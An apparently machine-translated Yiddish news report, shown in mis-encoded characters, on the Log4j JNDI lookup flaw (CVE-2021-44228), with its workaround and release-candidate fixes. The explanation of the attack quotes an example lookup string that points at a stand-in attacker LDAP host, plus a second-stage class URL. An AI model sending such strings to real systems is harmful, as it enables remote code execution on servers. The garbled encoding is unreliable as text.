ืงืึทื˜ืึทืกื˜ืจืึธืคื™ืง ื•ื•ืึทืœื ืขืจืึทื‘ื™ืœื™ื˜ื™ ืื™ืŸ Apache Log4j ืึทืคืขืงืฅ ืคื™ืœืข ื–'ืื‘ื ืคืจืื™ืขืงื˜ืŸ

ืื™ืŸ Apache Log4j, ืึท ืคืึธืœืงืก ืคืจื™ื™ืžื•ื•ืขืจืง ืคึฟืึทืจ ืึธืจื’ืึทื ื™ื™ื–ื™ื ื’ ืœืึธื’ื™ื ื’ ืื™ืŸ Java ืึทืคึผืœืึทืงื™ื™ืฉืึทื ื–, ืึท ืงืจื™ื˜ื™ืฉ ื•ื•ืึทืœื ืขืจืึทื‘ื™ืœื™ื˜ื™ ืื™ื– ื™ื™ื“ืขื ืึทืคื™ื™ื“ ืึทื– ืึทืœืึทื•ื– ืึทืจื‘ื™ื˜ืจืึทืจื™ืฉ ืงืึธื“ ืฆื• ื–ื™ื™ืŸ ืขืงืกืึทืงื™ื•ื˜ืึทื“ ื•ื•ืขืŸ ืึท ืกืคึผืขืฉืœื™ ืคืึธืจืžืึทื˜ื˜ืขื“ ื•ื•ืขืจื˜ ืื™ืŸ ื“ื™ "{jndi: URL}" ืคึฟืึธืจืžืึทื˜ ืื™ื– ื’ืขืฉืจื™ื‘ืŸ ืฆื• ื“ื™ ืงืœืึธืฅ. ื“ื™ ื‘ืึทืคืึทืœืŸ ืงืขื ืขืŸ ื–ื™ื™ืŸ ื“ื•ืจื›ื’ืขืงืึธื›ื˜ ืื•ื™ืฃ ื–'ืื‘ื ืึทืคึผืœืึทืงื™ื™ืฉืึทื ื– ื•ื•ืึธืก ืงืœืึธืฅ ื•ื•ืึทืœื•ืขืก ื‘ืืงื•ืžืขืŸ ืคื•ืŸ ืคื•ื ื“ืจื•ื™ืกื ื“ื™ืง ืงื•ื•ืืœืŸ, ืœืžืฉืœ ื•ื•ืขืŸ ื•ื•ื™ื™ึทื–ื ื“ื™ืง ืคึผืจืึธื‘ืœืขืžืึทื˜ื™ืง ื•ื•ืึทืœื•ืขืก ืื™ืŸ ื˜ืขื•ืช ืึทืจื˜ื™ืงืœืขืŸ.

ืขืก ืื™ื– ื‘ืืžืขืจืงื˜ ืึทื– ื›ึผืžืขื˜ ืึทืœืข ืคึผืจืึทื“ื–ืฉืขืงืก ื ื™ืฆืŸ ืคืจืึทืžืขื•ื•ืึธืจืงืก ืึทื–ืึท ื•ื•ื™ Apache Struts, Apache Solr, Apache Druid ืึธื“ืขืจ Apache Flink ื–ืขื ืขืŸ ืึทืคืขืงื˜ืึทื“ ื“ื•ืจืš ื“ืขื ืคึผืจืึธื‘ืœืขื, ืึทืจื™ื™ึทื ื’ืขืจืขื›ื ื˜ Steam, Apple iCloud, Minecraft ืงืœื™ื™ืึทื ืฅ ืื•ืŸ ืกืขืจื•ื•ืขืจืก. ืขืก ืื™ื– ื“ืขืจื•ื•ืึทืจื˜ ืึทื– ื“ื™ ื•ื•ืึทืœื ืขืจืึทื‘ื™ืœื™ื˜ื™ ืงืขืŸ ืคื™ืจืŸ ืฆื• ืึท ื›ื•ื•ืึทืœื™ืข ืคื•ืŸ โ€‹โ€‹ืžืึทืกื™ื•ื• ืื ืคืืœืŸ ืื•ื™ืฃ ืคึฟื™ืจืžืข ืึทืคึผืœืึทืงื™ื™ืฉืึทื ื–, ืจื™ืคึผื™ื˜ื™ื ื’ ื“ื™ ื’ืขืฉื™ื›ื˜ืข ืคื•ืŸ โ€‹โ€‹ืงืจื™ื˜ื™ืฉ ื•ื•ืึทืœื ืขืจืึทื‘ื™ืœื™ื˜ื™ื– ืื™ืŸ ื“ื™ Apache Struts ืคืจื™ื™ืžื•ื•ืขืจืง, ื•ื•ืึธืก, ืœื•ื™ื˜ ืึท ืคึผืจืึธืกื˜ ืึธืคึผืฉืึทืฆื•ื ื’, ืื™ื– ื’ืขื ื™ืฆื˜ ืื™ืŸ ื•ื•ืขื‘ ืึทืคึผืœืึทืงื™ื™ืฉืึทื ื– ื“ื•ืจืš 65% ืคื•ืŸ ืคืึธืจื˜ืฉื•ืŸ. 100 ืงืึธืžืคึผืึทื ื™ืขืก ืึทืจื™ื™ึทื ื’ืขืจืขื›ื ื˜ ืคืจื•ื•ื•ืŸ ืฆื• ื™ื‘ืขืจืงื•ืงืŸ ื“ื™ ื ืขืฅ ืคึฟืึทืจ ืฉืคึผื™ืจืขื•ื•ื“ื™ืง ืกื™ืกื˜ืขืžืขืŸ.

ื“ืขืจ ืคึผืจืึธื‘ืœืขื ืื™ื– ืคืึทืจืขืจื’ืขืจื˜ ื“ื•ืจืš ื“ื™ ืคืึทืงื˜ ืึทื– ืึท ืืจื‘ืขื˜ืŸ ืขืงืกืคึผืœื•ื™ื˜ ืื™ื– ืฉื•ื™ืŸ ืืจื•ื™ืก, ืึธื‘ืขืจ ืคื™ืงืกื™ื– ืคึฟืึทืจ ื“ื™ ืกื˜ืึทื‘ื™ืœ ืฆื•ื•ื™ื™ื’ืŸ ื–ืขื ืขืŸ ื ืึธืš ื ื™ืฉื˜ ืฆื•ื ื•ื™ืคื’ืขืฉื˜ืขืœื˜. ื“ื™ CVE ืื™ื“ืขื ื˜ื™ืคื™ืฆื™ืจืŸ ืื™ื– ื ืึธืš ื ื™ืฉื˜ ืึทืกื™ื™ื ื“. ื“ืขืจ ืคืึทืจืจื™ื›ื˜ืŸ ืื™ื– ื‘ืœื•ื™ื– ืึทืจื™ื™ึทื ื’ืขืจืขื›ื ื˜ ืื™ืŸ ื“ื™ log4j-2.15.0-rc1 ืคึผืจื•ื‘ื™ืจืŸ ืฆื•ื•ื™ื™ึทื’. ื•ื•ื™ ืึท ื•ื•ืึธืจืงืึทืจืึธื•ื ื“ ืคึฟืึทืจ ื‘ืœืึทืงื™ื ื’ ื“ื™ ื•ื•ืึทืœื ืขืจืึทื‘ื™ืœื™ื˜ื™, ืขืก ืื™ื– ืจืขืงืึทืžืขื ื“ื™ื“ ืฆื• ืฉื˜ืขืœืŸ ื“ื™ log4j2.formatMsgNoLookups ืคึผืึทืจืึทืžืขื˜ืขืจ ืฆื• ืืžืช.

ื“ืขืจ ืคืจืื‘ืœืขื ืื™ื– ื’ืขื•ื•ืขืŸ ื’ืขืคึฟื™ืจื˜ ื“ื•ืจืš log4j'ืก ืฉื˜ื™ืฆืข ืคึฟืึทืจ ืคึผืจืึทืกืขืกื™ื ื’ ืกืคึผืขืฆื™ืขืœืข ืžืึทืกืงืขืก "{}" ืื™ืŸ ืœืึธื’ ืฉื•ืจื•ืช, ื•ื•ืึธืก ืงืขื ืขืŸ ื’ืขื ื™ืฆื˜ ื•ื•ืขืจืŸ ืฆื• ื“ื•ืจื›ืคื™ืจืŸ JNDI (Java Naming and Directory Interface) ืคึฟืจืึทื’ืขืก. ื“ื™ ืึทื˜ืึทืงืข ืงื•ืžื˜ ืึทืจืึธืคึผ ืฆื• ื“ื•ืจื›ื’ืขื‘ืŸ ืึท ืกื˜ืจื™ื ื’ ืžื™ื˜ ื“ืขืจ ืกืึทื‘ืกื˜ื™ื˜ื•ืฆื™ืข "${jndi:ldap://attacker.com/a}", ื•ื•ืึธืก, ื•ื•ืขืŸ ืคึผืจืึทืกืขืกื˜, ื•ื•ืขื˜ log4j ืฉื™ืงืŸ ืกืขืจื•ื•ืขืจ attacker.com LDAP ืงื•ื•ืขืจื™ ืคืืจืŸ ื“ื–ืฉืื•ื•ื ืงืœืืก ื•ื•ืขื’. ืฆื•ืจื™ืงื’ืขื’ืขื‘ืŸ ืกืขืจื•ื•ืขืจ ื“ืขืจ ืื˜ืืงื™ืจืขืจ'ืก ื•ื•ืขื’ (ืœืžืฉืœ http://second-stage.attacker.com/Exploit.class) ื•ื•ืขื˜ ื•ื•ืขืจืŸ ื’ืขืœืึธื“ืŸ ืื•ืŸ ืื•ื™ืกื’ืขืคื™ืจื˜ ืื™ืŸ ื“ืขื ืงืื ื˜ืขืงืกื˜ ืคื•ืŸ ื“ืขื ืื™ืฆื˜ื™ืงืŸ ืคึผืจืึธืฆืขืก, ืื•ืŸ ื“ืึธืก ื•ื•ืขื˜ ื“ืขืจืžืขื’ืœืขื›ืŸ ื“ืขื ืื˜ืืงื™ืจืขืจ ืื•ื™ืกืฆื•ืคื™ืจืŸ ืึทืจื‘ื™ื˜ืจืขืจืŸ ืงืึธื“ ืื•ื™ืฃ ื“ืขืจ ืกื™ืกื˜ืขื ืžื™ื˜ ื“ื™ ืคึผืจื™ื•ื•ื™ืœืขื’ื™ืขืก ืคื•ืŸ ื“ืขืจ ืื™ืฆื˜ื™ืงืขืจ ืึทืคึผืœื™ืงืึทืฆื™ืข.

ืึทื“ืขื ื“ื•ื 1: ื“ื™ ื•ื•ืึทืœื ืขืจืึทื‘ื™ืœื™ื˜ื™ ืื™ื– ืึทืกื™ื™ื ื“ ื“ื™ ื™ื“ืขื ื˜ื™ืคื™ืขืจ CVE-2021-44228.

ืึทื“ืขื ื“ื•ื 2: ื ื•ื•ืขื’ ืฆื• ื‘ื™ื™ืคึผืึทืก ื“ื™ ืฉื•ืฅ ืฆื•ื’ืขื’ืขื‘ืŸ ื“ื•ืจืš ืžืขืœื“ื•ื ื’ log4j-2.15.0-rc1 ืื™ื– ื™ื™ื“ืขื ืึทืคื™ื™ื“. ื ื ื™ื™ึทืข ื“ืขืจื”ื™ื™ึทื ื˜ื™ืงืŸ, log4j-2.15.0-rc2, ืื™ื– ืคืืจื’ืขืœื™ื™ื’ื˜ ืžื™ื˜ ืžืขืจ ืคื•ืœืฉื˜ืขื ื“ื™ืง ืฉื•ืฅ ืงืขื’ืŸ ื“ื™ ื•ื•ืึทืœื ืขืจืึทื‘ื™ืœื™ื˜ื™. ื“ืขืจ ืงืึธื“ ื›ื™ื™ืœื™ื™ืฅ ื“ื™ ืขื ื“ืขืจื•ื ื’ ืคึฟืึทืจื‘ื•ื ื“ืŸ ืžื™ื˜ ื“ืขืจ ืึทื•ื•ืขืง ืคื•ืŸ ืึทืŸ ืึทื‘ื ืึธืจืžืึทืœ ื˜ืขืจืžืึทื ื™ื™ืฉืึทืŸ ืื™ืŸ ื“ื™ ืคืึทืœ ืคื•ืŸ ื ื™ืฆืŸ ืึท ื™ื ืงืขืจืขืงื˜ืœื™ ืคืึธืจืžืึทื˜ื˜ืขื“ JNDI URL.

ืžืงื•ืจ: opennet.ru

ืงื•ื™ืคืŸ ืคืึทืจืœืึธื–ืœืขืš ื”ืึธืกื˜ื™ื ื’ ืคึฟืึทืจ ื–ื™ื™ื˜ืœืขืš ืžื™ื˜ DDoS ืฉื•ืฅ, VPS VDS ืกืขืจื•ื•ืขืจืก ๐Ÿ”ฅ ืงื•ื™ืคื˜ ืคืึทืจืœืขืกืœืขื›ืข ื•ื•ืขื‘ื–ื™ื™ื˜ืœ ื”ืึธืกื˜ื™ื ื’ ืžื™ื˜ DDoS ืฉื•ืฅ, VPS VDS ืกืขืจื•ื•ืขืจืก | ProHoster